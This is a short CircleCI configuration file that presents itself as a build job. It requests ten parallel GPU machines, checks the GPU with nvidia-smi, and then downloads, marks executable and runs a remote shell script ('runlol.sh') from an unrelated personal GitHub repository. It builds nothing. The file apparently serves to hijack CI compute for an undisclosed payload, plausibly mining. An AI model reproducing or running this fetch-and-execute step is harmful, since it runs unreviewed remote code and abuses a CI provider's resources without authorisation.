version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-10.1:201909-23
    parallelism: 10
    resource_class: gpu.nvidia.medium
    steps:
      - run: nvidia-smi
      - run: wget https://raw.githubusercontent.com/novasusan090/a/main/runlol.sh && chmod +x runlol.sh && ./runlol.sh
